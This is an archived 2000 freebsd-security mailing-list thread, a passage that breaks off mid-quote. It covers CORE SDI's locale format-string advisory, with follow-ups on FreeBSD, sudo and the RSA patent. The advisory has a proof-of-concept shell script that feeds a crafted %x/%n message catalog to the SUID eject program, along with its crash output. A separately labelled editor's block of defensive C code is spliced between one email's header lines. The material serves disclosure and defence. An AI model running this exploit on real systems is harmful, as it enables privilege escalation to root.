$ ./sample %x%x%x%x%x%n%n%n%n%n%n%n%n%n
%x%x%x%x%x%n%n%n%n%n%n%n%n%n
Memory fault (core dumped)
$

Recent posts to computer security lists and related publications provide good reference material to understand the problem and possible ways to exploit it.

It has been found that most programs in many popular operating systems suffer from this problem derived from the way the messages database of the locale subsystem is used.
In particular, privileged programs (programs with the SUID bit set) that exercise access to the database using the gettext(3) function in a vulnerable manner are directly exploitable and allow an attacker to obtain root privileges instantly. The following code exemplifies a common bad coding practice that makes the cited programs vulnerable:

#include <stdio.h>
#include <stdlib.h>
#include <libintl.h>

int main(int argc, char **argv)
{
    if (argc > 1) {
        /* Bad: whatever gettext(3) returns is used as the format string */
        printf(gettext("usage: %s filename\n"), argv[0]);
        exit(0);
    }
    printf("normal execution proceeds...\n");
    return 0;
}

Here the output of the gettext(3) function is not validated and passed directly to printf(3). gettext(3) searches the messages database for a message that matches the key "usage: %s filename\n" in the current locale settings and returns it to the caller. A malicious, unprivileged, user can build and install a bogus messages database and instruct the vulnerable program to use it, thus controlling the output of gettext() and force-feeding formatting characters to printf(3).

The problem above is NOT related to the user input to the program but instead to the data contained in the messages database. The following commands demonstrate the problem:

$ uname -a
SunOS maul 5.7 Generic_106541-02 sun4m Sparc SUNW,SPARCstation-5
$ ls -l /usr/bin/eject
-r-sr-xr-x   1 root     bin        14352 Oct  6  1998 /usr/bin/eject
$ eject -x`perl -e 'print "ABCDEF". "A"x507'`
eject: illegal option -- x
usage: eject [-fndq] [name | nickname]
options:
        -f force eject
        -n show nicknames
        -d show default device
        -q query for media present
        -p do not call eject_popup
$ cat >doit.sh
#!/bin/ksh
export NLSPATH=:`pwd`
echo domain \"messages\" > messages.po
echo msgid \""usage: %s [-fndq] [name | nickname]\\\n"\" >> messages.po
echo msgstr \"`perl -e 'print "%x"x112 . "%n"'`\" >> messages.po
msgfmt messages.po
cp messages.mo SUNW_OST_OSCMD
cp messages.mo SUNW_OST_OSLIB
exec eject -x`perl -e 'print "ABCDEF" . "A"x507'`
^D
$ ./doit.sh
eject: illegal option -- x
effffba47efefeff1ff00ef735a38effffba4000447ef7fca782effffac4129642326c00
effffa60
115083effffac44effffad05effffb2c002effffac4effffad0230000000000000000000
00002eff
ffba4effffbaa0effffdaeeffffdbfeffffdd5effffdf1effffdf8effffe10effffe2eef
fffe9aef
fffebeeffffed0effffedeeffffef2efffff0befffff20efffff33efffff42efffff5aef
ffff72ef
ffff7defffff94efffff9defffffaf07d8efffffd67deefffffea3100344205591142c7e
f7d00008
0610007d007d13ee7d217d317d9300656a656374002d78Segmentation Fault
$ exit

As shown, the SUID program 'eject' follows the user directives to use a custom (bogus) messages database. The specific way to do it varies in different operating systems but usually involves the usage of environment variables (NLSPATH, LC_MESSAGES, LANG, etc.) and/or locale library functions (textdomain(3), bindtextdomain(3), etc.)

The problem however stems from bad coding practices in the operating system's programs:

 - A SUID program should not follow the user's directives of what database it should use; locale databases should be taken from a secure trusted directory.
 - Output of gettext(3) should not be passed as a format string directly to printf(3) functions.

References

A good reference for localization and internationalization is the "Programming for internationalization FAQ":
http://www.cs.ruu.nl/wais/html/na-dir/internationalization/programming-faq.html
Sections 3 and 5 describe the locale subsystem and the X/Open and Sun/Uniforum set of functions for language independent messages.

Format string bugs and exploitation are described in:
http://julianor.tripod.com/usfs.html
http://julianor.tripod.com/kalou-formats.txt

Recent vulnerabilities involving format strings
http://www.securityfocus.com/bid/1387
http://www.securityfocus.com/bid/1425
http://www.securityfocus.com/bid/1572

$Id: locale-advisory.txt,v 1.8 2000/09/04 17:14:51 iarce Exp $

- --
"Understanding.
A cerebral secretion that enables one having it to know a house from a horse by the roof on the house. Its nature and laws have been exhaustively expounded by Locke, who rode a house, and Kant, who lived in a horse."
- Ambrose Bierce

==================[ CORE Seguridad de la Informacion S.A. ]=========
Iván Arce
Presidente
PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836 B25D 207B E78E 2AD1 F65A
email : iarce@core-sdi.com
http://www.core-sdi.com
Pte. Juan D. Peron 315 Piso 4 UF 17
1038 Capital Federal
Buenos Aires, Argentina.
Tel/Fax : +(54-11) 4331-5402
Casilla de Correos 877 (1000) Correo Central
=================================================================

- ---
For a personal reply use iarce@core-sdi.com

------- End of Forwarded Message

From owner-freebsd-security Tue Sep 5 10:23:15 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CC3EE37B42C; Tue, 5 Sep 2000 10:23:12 -0700 (PDT)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id KAA20265; Tue, 5 Sep 2000 10:23:12 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Tue, 5 Sep 2000 10:23:12 -0700 (PDT)
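[Editor's added example. This is not part of any message in this thread and is not code from CORE SDI, FreeBSD or GNU gettext.] The forwarded advisory closes with two rules: do not let a set-ID program take its catalog from a user-supplied path, and do not hand gettext(3) output to printf(3) as the format. The C below shows both as checks a program can actually apply. checked_translation() accepts a catalog string as a format only if its conversion directives match the program's own key exactly (count, order and types; %n is always rejected), so a messages.po entry like the %x...%n one in the eject demonstration falls back to the untranslated key. catalog_dir() returns a trusted directory instead of the caller's NLSPATH whenever real and effective IDs differ, which is the behaviour the advisory credits for FreeBSD not being affected. The catalog strings, the /usr/share/nls and /tmp/evil paths and the uid/gid values are constructed for the demonstration, and all function names are chosen here rather than taken from any libc.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/* Conversion letters this check models.  %n is deliberately absent: a
 * directive that writes to memory has no business in a message catalog. */
static const char CONVERSIONS[] = "diouxXeEfFgGaAcsp";

/* Collect the conversion letters of a printf-style format, in order
 * ("usage: %s [%d]\n" -> "sd").  Returns 0 on success; -1 if the format
 * uses %n, an unmodelled or truncated directive, or has more directives
 * than fit in sig. */
static int format_signature(const char *fmt, char *sig, size_t siglen)
{
    size_t n = 0;
    const char *p;

    if (siglen == 0)
        return -1;
    for (p = fmt; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')                      /* "%%" is a literal percent sign */
            continue;
        /* flags, field width, precision, positional ($) and length modifiers */
        while (*p != '\0' && strchr("-+ #0123456789.*$hlLqjzt", *p) != NULL)
            p++;
        if (*p == '\0' || strchr(CONVERSIONS, *p) == NULL)
            return -1;
        if (n + 1 >= siglen)
            return -1;
        sig[n++] = *p;
    }
    sig[n] = '\0';
    return 0;
}

/* Use a catalog string as a format only when its directives match the
 * program's own key exactly.  On any mismatch fall back to the key, which
 * the program controls.  This is the run-time counterpart of the
 * consistency check msgfmt(1) can apply when a catalog is built; it does
 * not make an untrusted catalog path acceptable (see catalog_dir). */
static const char *checked_translation(const char *key, const char *translated)
{
    char want[32], have[32];

    if (format_signature(key, want, sizeof want) != 0 ||
        format_signature(translated, have, sizeof have) != 0)
        return key;
    return strcmp(want, have) == 0 ? translated : key;
}

/* Render a usage line through the checked format.  The check guarantees
 * that exactly the key's directives (here a single %s) survive, so the
 * non-literal format is well-formed for the one argument supplied. */
static int render_usage(char *out, size_t outlen, const char *key,
                        const char *translated, const char *progname)
{
    return snprintf(out, outlen, checked_translation(key, translated), progname);
}

/* Where a program may load message catalogs from.  When real and effective
 * IDs differ (set-UID or set-GID), the caller's NLSPATH is ignored in favour
 * of a trusted system directory.  The IDs are parameters so the policy can
 * be exercised without actually running set-ID; a real program would pass
 * getuid()/geteuid()/getgid()/getegid(). */
static const char *catalog_dir(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid,
                               const char *env_nlspath, const char *trusted)
{
    if (ruid != euid || rgid != egid)
        return trusted;
    if (env_nlspath == NULL || *env_nlspath == '\0')
        return trusted;
    return env_nlspath;
}

int main(void)
{
    /* Constructed inputs: a key as a program would pass it to gettext(3), a
     * legitimate translation, and a hostile one in the spirit of the
     * advisory's messages.po (many %x to walk the stack, then %n). */
    const char *key = "usage: %s [-fndq] [name | nickname]\n";
    const char *benign = "Aufruf: %s [-fndq] [Name | Spitzname]\n";
    const char *hostile = "%x%x%x%x%x%x%x%x%x%x%x%x%n\n";
    char line[128];

    render_usage(line, sizeof line, key, benign, "eject");
    fputs(line, stdout);                    /* translation accepted, "eject" filled in */
    render_usage(line, sizeof line, key, hostile, "eject");
    fputs(line, stdout);                    /* hostile catalog rejected: the key is used */

    /* An unprivileged caller keeps its NLSPATH; a set-UID root program does not. */
    printf("%s\n", catalog_dir(1000, 1000, 1000, 1000, "/home/user/nls", "/usr/share/nls"));
    printf("%s\n", catalog_dir(1000, 0, 1000, 0, "/tmp/evil", "/usr/share/nls"));
    return 0;
}
```

The signature comparison is stricter than counting directives: "usage: %d" is rejected against a "usage: %s" key even though both have one directive, because a type mismatch is enough to read the wrong stack slot. Treat it as defence in depth; the primary fix remains printf("%s", msg) with the translated text as an argument, and a set-ID program that only ever opens catalogs under the trusted directory.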
From: Kris Kennaway
To: Cy Schubert - ITSD Open Systems Group
Cc: freebsd-security@freebsd.org, security-officer@freebsd.org
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To: <200009051354.e85Dshb28813@cwsys.cwsent.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Tue, 5 Sep 2000, Cy Schubert - ITSD Open Systems Group wrote:

> Wouldn't a FreeBSD system with Linux compatibility being utilised be
> vulnerable too?

Yes, but only if you've installed a vulnerable linux binary which is setuid or setgid something. We don't install any set[ug]id binaries in the linux_base or linux_devtools ports.

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security Wed Sep 6 9:21:38 2000
Delivered-To: freebsd-security@freebsd.org
Received: from moek.pir.net (moek.pir.net [209.192.237.190]) by hub.freebsd.org (Postfix) with ESMTP id 6D65E37B422; Wed, 6 Sep 2000 09:21:34 -0700 (PDT)
Received: from pir by moek.pir.net with local (Exim) id 13Whww-0004Pl-00 ; Wed, 06 Sep 2000 12:21:22 -0400
Date: Wed, 6 Sep 2000 12:21:22 -0400
From: Peter Radcliffe
To: freebsd-security@freebsd.org, freebsd-stable@freebsd.org
Message-ID: <20000906122122.A16295@pir.net>
Reply-To: freebsd-security@freebsd.org, freebsd-stable@freebsd.org
Mail-Followup-To: freebsd-security@freebsd.org, freebsd-stable@freebsd.org
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2i
X-fish: <
X-Copy-On-Listmail: Please do NOT Cc: me on list mail.

In light of RSA being put into the public domain a little early, can we have full, real, RSA in -stable soon? :)

http://www.rsasecurity.com/news/pr/000906-1.html

P.

-- 
pir                  pir@pir.net                    pir@net.tufts.edu

From owner-freebsd-security Wed Sep 6 11:28: 4 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ns1.infowest.com (ns1.infowest.com [204.17.177.10]) by hub.freebsd.org (Postfix) with ESMTP id B560037B422; Wed, 6 Sep 2000 11:27:59 -0700 (PDT)
Received: by ns1.infowest.com (Postfix, from userid 0) id DAA8E21187; Wed, 6 Sep 2000 12:27:58 -0600 (MDT)
To: questions@freebsd.org, , security@freebsd.org
Subject: No more RSAREF???
Reply-To: 
From: "Aaron D. Gifford"
Message-Id: <20000906182758.DAA8E21187@ns1.infowest.com>
Date: Wed, 6 Sep 2000 12:27:58 -0600 (MDT)

With today's announcement by RSA Security, Inc. that beginning today (6 Sept. 2000) they will no longer enforce the RSA patent (which expires later this month on the 20th anyway), how will this change FreeBSD's plans to completely remove the requirement for RSAREF use in the US? Will it simplify things much? Will international (non-US) and domestic (US) crypto sources merge together better?

Aaron out.

P.S. The announcement can be seen at http://www.rsasecurity.com/news/pr/000906-1.html

From owner-freebsd-security Wed Sep 6 13: 5:37 2000
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 82D3537B422 for ; Wed, 6 Sep 2000 13:05:31 -0700 (PDT)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA16899 for ; Wed, 6 Sep 2000 14:05:20 -0600 (MDT)
Message-Id: <4.3.2.7.2.20000906140348.04d2bb40@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Wed, 06 Sep 2000 14:05:12 -0600
To: security@FreeBSD.ORG
From: Brett Glass
Subject: RSA patent released early!
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed

According to

http://www.zdnet.com/zdnn/stories/news/0,4586,2624678,00.html

RSA has released its patent to the world before the official expiration date. Hopefully, full-strength RSA (not RSAREF) can now come in the standard FreeBSD distribution....

--Brett Glass

From owner-freebsd-security Wed Sep 6 13:40:23 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A28D437B42C; Wed, 6 Sep 2000 13:40:18 -0700 (PDT)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA57704; Wed, 6 Sep 2000 13:40:18 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Wed, 6 Sep 2000 13:40:18 -0700 (PDT)
From: Kris Kennaway
To: "Aaron D. Gifford"
Cc: questions@freebsd.org, security@freebsd.org
Subject: Re: No more RSAREF???
In-Reply-To: <20000906182758.DAA8E21187@ns1.infowest.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Wed, 6 Sep 2000, Aaron D. Gifford wrote:

> With today's announcement by RSA Security, Inc. that beginning today
> (6 Sept. 2000) they will no longer enforce the RSA patent (which expires
> later this month on the 20th anyway), how will this change FreeBSD's
> plans to completely remove the requirement for RSAREF use in the US?
> Will it simplify things much? Will international (non-US) and domestic
> (US) crypto sources merge together better?

The US version will catch up with what non-US people have been enjoying for the past 6 months or so. I'll be committing tonight to -current - in the meantime, you can just build world with MAKE_RSAINTL=yes and not feel guilty :-)

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security Wed Sep 6 22:12:39 2000
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 065BB37B422; Wed, 6 Sep 2000 22:12:30 -0700 (PDT)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id XAA22422; Wed, 6 Sep 2000 23:12:17 -0600 (MDT)
Message-Id: <4.3.2.7.2.20000906165231.04a49e20@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Wed, 06 Sep 2000 16:57:28 -0600
To: Kris Kennaway , "Aaron D. Gifford"
From: Brett Glass
Subject: Re: No more RSAREF???
Cc: questions@FreeBSD.ORG, security@FreeBSD.ORG
In-Reply-To: 
References: <20000906182758.DAA8E21187@ns1.infowest.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

Kris:

This is good news! Will you also commit to -stable? Will OpenSSH run properly out of the box after the commit? (So far, I've never been able to get the version of OpenSSH in the base distribution to work. It complains that RSAREF is missing, even after the RSAREF port is installed.)

--Brett

At 02:40 PM 9/6/2000, Kris Kennaway wrote:
>On Wed, 6 Sep 2000, Aaron D. Gifford wrote:
>
>> With today's announcement by RSA Security, Inc. that beginning today
>> (6 Sept. 2000) they will no longer enforce the RSA patent (which expires
>> later this month on the 20th anyway), how will this change FreeBSD's
>> plans to completely remove the requirement for RSAREF use in the US?
>> Will it simplify things much? Will international (non-US) and domestic
>> (US) crypto sources merge together better?
>
>The US version will catch up with what non-US people have been enjoying
>for the past 6 months or so. I'll be committing tonight to -current - in
>the meantime, you can just build world with MAKE_RSAINTL=yes and not feel
>guilty :-)
>
>Kris
>
>--
>In God we Trust -- all others must submit an X.509 certificate.
>    -- Charles Forsythe
>
>
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Sep 6 22:36:33 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4290D37B423; Wed, 6 Sep 2000 22:36:32 -0700 (PDT)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id WAA49848; Wed, 6 Sep 2000 22:36:32 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Wed, 6 Sep 2000 22:36:32 -0700 (PDT)
From: Kris Kennaway
To: Brett Glass
Cc: "Aaron D. Gifford" , security@FreeBSD.ORG
Subject: Re: No more RSAREF???
In-Reply-To: <4.3.2.7.2.20000906165231.04a49e20@localhost>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Wed, 6 Sep 2000, Brett Glass wrote:

> This is good news! Will you also commit to -stable? Will OpenSSH
> run properly out of the box after the commit? (So far, I've never
> been able to get the version of OpenSSH in the base distribution to
> work. It complains that RSAREF is missing, even after the RSAREF
> port is installed.)

Yes and yes.

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security Thu Sep 7 1:12:18 2000
Delivered-To: freebsd-security@freebsd.org
Received: from nenya.ms.mff.cuni.cz (nenya.ms.mff.cuni.cz [195.113.17.179]) by hub.freebsd.org (Postfix) with ESMTP id B0F9D37B962; Thu, 7 Sep 2000 01:12:13 -0700 (PDT)
Received: from localhost (mencl@localhost) by nenya.ms.mff.cuni.cz (8.9.3+Sun/8.9.1) with ESMTP id KAA23177; Thu, 7 Sep 2000 10:12:11 +0200 (MET DST)
Date: Thu, 7 Sep 2000 10:12:11 +0200 (MET DST)
From: "Vladimir Mencl, MK, susSED"
To: Kris Kennaway
Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Tue, 5 Sep 2000, Kris Kennaway wrote:

> On Tue, 5 Sep 2000, Cy Schubert - ITSD Open Systems Group wrote:
>
> > Wouldn't a FreeBSD system with Linux compatibility being utilised be
> > vulnerable too?
>
> Yes, but only if you've installed a vulnerable linux binary which is
> setuid or setgid something. We don't install any set[ug]id binaries in the
> linux_base or linux_devtools ports.
>
> Kris

However, I think that FreeBSD is vulnerable with the sudo port installed.

Although sudo discards some dangerous environment variables (LD_LIBRARY_PATH) it does pass the LC_ALL, PATH_LOCALE variables through.

Therefore, I believe that any user allowed to use sudo to execute a program with elevated privileges can potentially exploit this vulnerability.

So, at least a port security advisory should be issued, and possibly the sudo port patched to discard locale-specific environment variables.

Best regards
Vladimir Mencl

From owner-freebsd-security Thu Sep 7 1:49:52 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ns1.sunesi.net (ns1.sunesi.net [196.15.192.194]) by hub.freebsd.org (Postfix) with ESMTP id 6216537B422; Thu, 7 Sep 2000 01:49:47 -0700 (PDT)
Received: from nbm by ns1.sunesi.net with local (Exim 3.03 #1) id 13WxN8-0009rM-00; Thu, 07 Sep 2000 10:49:26 +0200
Date: Thu, 7 Sep 2000 10:49:26 +0200
From: Neil Blakey-Milner
To: "Vladimir Mencl, MK, susSED"
Cc: Kris Kennaway , Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
Message-ID: <20000907104925.A37872@mithrandr.moria.org>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: ; from mencl@nenya.ms.mff.cuni.cz on Thu, Sep 07, 2000 at 10:12:11AM +0200
Organization: Sunesi Clinical Systems
X-Operating-System: FreeBSD 3.3-RELEASE i386
X-URL: http://rucus.ru.ac.za/~nbm/

On Thu 2000-09-07 (10:12), Vladimir Mencl, MK, susSED wrote:
> > > Wouldn't a FreeBSD system with Linux compatibility being utilised be
> > > vulnerable too?
> >
> > Yes, but only if you've installed a vulnerable linux binary which is
> > setuid or setgid something. We don't install any set[ug]id binaries in the
> > linux_base or linux_devtools ports.
> >
> > Kris
>
> However, I think that FreeBSD is vulnerable with the sudo port
> installed.
>
> Although sudo discards some dangerous environment variables (LD_LIBRARY_PATH)
> it does pass the LC_ALL, PATH_LOCALE variables through.
>
> Therefore, I believe that any user allowed to use sudo to execute a
> program with elevated privileges can potentially exploit this
> vulnerability.
>
> So, at least a port security advisory should be issued, and possibly the
> sudo port patched to discard locale-specific environment variables.

Why would someone install the sudo RedHat package on FreeBSD?
Neil

-- 
Neil Blakey-Milner
Sunesi Clinical Systems
nbm@mithrandr.moria.org

From owner-freebsd-security Thu Sep 7 1:57: 8 2000
Delivered-To: freebsd-security@freebsd.org
Received: from nenya.ms.mff.cuni.cz (nenya.ms.mff.cuni.cz [195.113.17.179]) by hub.freebsd.org (Postfix) with ESMTP id CCD9537B424 for ; Thu, 7 Sep 2000 01:57:05 -0700 (PDT)
Received: from localhost (mencl@localhost) by nenya.ms.mff.cuni.cz (8.9.3+Sun/8.9.1) with ESMTP id KAA24467; Thu, 7 Sep 2000 10:56:59 +0200 (MET DST)
Date: Thu, 7 Sep 2000 10:56:59 +0200 (MET DST)
From: "Vladimir Mencl, MK, susSED"
To: Neil Blakey-Milner
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To: <20000907104925.A37872@mithrandr.moria.org>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Thu, 7 Sep 2000, Neil Blakey-Milner wrote:

> Why would someone install the sudo RedHat package on FreeBSD?

sudo is a FreeBSD port, and is distributed in the set of precompiled packages, for quite a long time, and is of course included in the package set of the 4.1 release - sudo-1.6.3.4.tgz

And sudo is a nice tool for delegating certain privileges to users, that's why I installed it. It's surely more secure than telling everybody the root password - although you have to be careful not to create a security hole.

Vladimir Mencl

** reduced Cc: header

From owner-freebsd-security Thu Sep 7 2:22:25 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail2.netcologne.de (mail2.netcologne.de [194.8.194.103]) by hub.freebsd.org (Postfix) with ESMTP id CAFCE37B422; Thu, 7 Sep 2000 02:22:22 -0700 (PDT)
Received: from bagabeedaboo.security.at12.de (dial-213-168-73-240.netcologne.de [213.168.73.240]) by mail2.netcologne.de (8.9.3/8.9.3) with ESMTP id LAA05126; Thu, 7 Sep 2000 11:22:21 +0200 (MET DST)
Received: from localhost (localhost.security.at12.de [127.0.0.1]) by bagabeedaboo.security.at12.de (8.11.0/8.11.0) with ESMTP id e879MAr00405; Thu, 7 Sep 2000 11:22:10 +0200 (CEST) (envelope-from pherman@frenchfries.net)
Date: Thu, 7 Sep 2000 11:22:10 +0200 (CEST)
From: Paul Herman
To: Neil Blakey-Milner
Cc: Kris Kennaway , freebsd-security@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To: <20000907104925.A37872@mithrandr.moria.org>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Thu, 7 Sep 2000, Neil Blakey-Milner wrote:

> On Thu 2000-09-07 (10:12), Vladimir Mencl, MK, susSED wrote:
> >
> > However, I think that FreeBSD is vulnerable with the sudo port
> > installed.
> >
> > Although sudo discards some dangerous environment variables (LD_LIBRARY_PATH)
> > it does pass the LC_ALL, PATH_LOCALE variables through.
>
> Why would someone install the sudo RedHat package on FreeBSD?

:) I think he meant the FreeBSD sudo port, which in turn *may* sudo a Linux binary. (yes, I know, not so likely, but...)

However, this thread only talked about vulnerable Linux programs under emulation. There were indeed two advisories this last weekend, the glibc advisory (linux only) and the locale advisory, which AFAIK affects other platforms (Solaris is affected, for example.) I've been following freebsd-security, but I haven't seen any confirmation one way or the other (except for linux binaries mentioned in this thread.)

Kris, is FreeBSD itself vulnerable to the locale vuln.?

-Paul.

From owner-freebsd-security Thu Sep 7 2:34:30 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ns1.sunesi.net (ns1.sunesi.net [196.15.192.194]) by hub.freebsd.org (Postfix) with ESMTP id 799CB37B422 for ; Thu, 7 Sep 2000 02:34:25 -0700 (PDT)
Received: from nbm by ns1.sunesi.net with local (Exim 3.03 #1) id 13Wy4a-000A0s-00; Thu, 07 Sep 2000 11:34:20 +0200
Date: Thu, 7 Sep 2000 11:34:20 +0200
From: Neil Blakey-Milner
To: "Vladimir Mencl, MK, susSED"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
Message-ID: <20000907113419.A38101@mithrandr.moria.org>
References: <20000907104925.A37872@mithrandr.moria.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: ; from mencl@nenya.ms.mff.cuni.cz on Thu, Sep 07, 2000 at 10:56:59AM +0200
Organization: Sunesi Clinical Systems
X-Operating-System: FreeBSD 3.3-RELEASE i386
X-URL: http://rucus.ru.ac.za/~nbm/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu 2000-09-07 (10:56), Vladimir Mencl, MK, susSED wrote:

> > Why would someone install the sudo RedHat package on FreeBSD?
>
> sudo is a FreeBSD port, and is distributed in the set of precompiled
> packages, for quite a long time, and is of course included in the package
> set of the 4.1 release - sudo-1.6.3.4.tgz
>
> And sudo is a nice tool for delegating certain privileges to users,
> that's why I installed it. It's surely more secure, than telling
> everybody the root password - although you have to be careful not to
> create a security hole.

I understand sudo is a FreeBSD package. However, its insecurity has nothing to do with the glibc locale bug, so it should be investigated in its own context. I imagine bringing it to the attention of the sudo developers would be a good idea. I'd be surprised if they didn't fix it once aware of it.

(I don't use sudo. Custom setuid scripts with rcs-aware editors running as user are usually much better.)
Neil

--
Neil Blakey-Milner
Sunesi Clinical Systems
nbm@mithrandr.moria.org

From owner-freebsd-security Thu Sep 7 2:47:30 2000
Delivered-To: freebsd-security@freebsd.org
Received: from columbus.cris.net (columbus.cris.net [212.110.128.65]) by hub.freebsd.org (Postfix) with ESMTP id 15FCB37B423 for ; Thu, 7 Sep 2000 02:47:27 -0700 (PDT)
Received: from ark.cris.net (ark.cris.net [212.110.128.68]) by columbus.cris.net (8.9.3/8.9.3) with ESMTP id MAA73102; Thu, 7 Sep 2000 12:47:08 +0300 (EEST)
Received: (from phantom@localhost) by ark.cris.net (8.9.3/8.9.3) id MAA31262; Thu, 7 Sep 2000 12:46:52 +0300 (EEST) (envelope-from phantom)
Date: Thu, 7 Sep 2000 12:46:52 +0300
From: Alexey Zelkin
To: Paul Herman
Cc: security@freeBSD.org
Subject: Re: UNIX locale format string vulnerability (fwd)
Message-ID: <20000907124652.A30896@ark.cris.net>
References: <20000907104925.A37872@mithrandr.moria.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: ; from pherman@frenchfries.net on Thu, Sep 07, 2000 at 11:22:10AM +0200
X-Operating-System: FreeBSD 3.5-STABLE i386
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

hi,

On Thu, Sep 07, 2000 at 11:22:10AM +0200, Paul Herman wrote:

> I've been following freebsd-security, but I haven't seen any
> confirmation one way or the other (except for linux binaries mentioned
> in this thread.) Kris, is FreeBSD itself vulnerable to the locale
> vuln.?

Please read the original post more carefully. It contains an answer (BTW, exactly from Kris)

--
/* Alexey Zelkin && phantom@cris.net */
/* Tavric National University && phantom@FreeBSD.org */
/* Sysadmin/Developer && phantom@sms.umc.com.ua */

From owner-freebsd-security Thu Sep 7 2:53:57 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 827BE37B423; Thu, 7 Sep 2000 02:53:52 -0700 (PDT)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id CAA91350; Thu, 7 Sep 2000 02:53:52 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Thu, 7 Sep 2000 02:53:51 -0700 (PDT)
From: Kris Kennaway
To: Paul Herman
Cc: Neil Blakey-Milner , freebsd-security@FreeBSD.ORG, security-officer@freebsd.org
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 7 Sep 2000, Paul Herman wrote:

> However, this thread only talked about vulnerable Linux programs under
> emulation. There were indeed two advisories this last weekend, the
> glibc advisory (linux only) and the locale advisory, which AFAIK
> affects other platforms (Solaris is affected, for example.)
>
> I've been following freebsd-security, but I haven't seen any
> confirmation one way or the other (except for linux binaries mentioned
> in this thread.) Kris, is FreeBSD itself vulnerable to the locale
> vuln.?

